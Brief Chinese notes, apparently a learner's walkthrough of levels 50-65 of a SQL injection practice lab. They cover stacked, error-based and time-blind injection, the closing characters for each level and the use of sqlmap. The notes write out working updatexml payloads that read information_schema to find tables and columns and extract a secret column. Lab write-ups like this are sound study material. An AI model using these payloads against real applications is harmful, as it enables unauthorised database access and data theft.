50 51 这两关是堆叠注入没什么差别好像除了51有个单引号
52 53 又关闭了报错 然后堆叠也可以弄一弄 用sqlmap 直接解决
54 单引号 55括号 56 ‘) 57” 54-57这几关有次数限制 然后和之前用union select 的一样就获取数据的
要获取的是secret_(后面这串是随机的) 这个列里头的数据 获取玩提交一下就可以了
58 先随便试一试 存在报错信息 而且union select的没有回显只好用报错了
?id=0’ and updatexml(1,(select concat(1,(select table_name from information_schema.tables where table_schema=’challenges))),1) –+ 查表
?id=0’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’mz8xr9yz2a’),0x7e),1)–+ 查列
?id=0’ and updatexml(1,concat(0x7e,(select secret_VP4R from challenges.mz8xr9yz2a),0x7e),1) –+ 查到数据提交就ok了
59数字型?id=0 其余同上一关
60 ?id=0”) 61 ?id=0’))
62关了报错 但是存在明显延迟时间盲注 那就用sqlmap吧 62手动注入’)
63 手动注入的话单引号闭合
64 俩括号
65双引号加个括号 这几关都是时间盲注 用sqlmap吧